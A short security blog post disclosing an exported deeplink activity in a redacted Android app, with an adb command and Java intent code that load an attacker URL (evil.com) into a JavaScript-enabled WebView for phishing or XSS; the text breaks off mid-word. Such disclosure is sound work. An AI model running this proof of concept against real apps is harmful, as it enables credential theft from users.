# Xss in Android App

**Published by:** [TheSecurityGuy](https://paragraph.com/@mrbalu/)
**Published on:** 2022-12-02
**URL:** https://paragraph.com/@mrbalu/xss-in-android-app

## Content

The app can be launched by any other app because its deeplink activity is exported=true. Adb exploit adb shell am start -a android.intent.action.VIEW -n com.redacted.android/"com.redacted.activities.DeepLinkActivity" -d "https://evil.com" Apk Exploit Intent intent = new Intent(); intent.setClassName("com.redacted.android","com.redcated.android.activities.DeepLinkActivity"); intent.setData(Uri.parse("https://evil.com")); startActivity(intent); Impact The attcker can craft a phishing page and grab the credentails. or can launch a xss attack because the webview has javascriptenabled(true). Most of the case the victim believe it as an legitimate url because it is loading in legititmate vulnerable ap

## Publication Information

- [TheSecurityGuy](https://paragraph.com/@mrbalu/): Publication homepage
- [All Posts](https://paragraph.com/@mrbalu/): More posts from this publication
- [RSS Feed](https://api.paragraph.com/blogs/rss/@mrbalu): Subscribe to updates
- [Twitter](https://twitter.com/_TheSecurityGuy): Follow on Twitter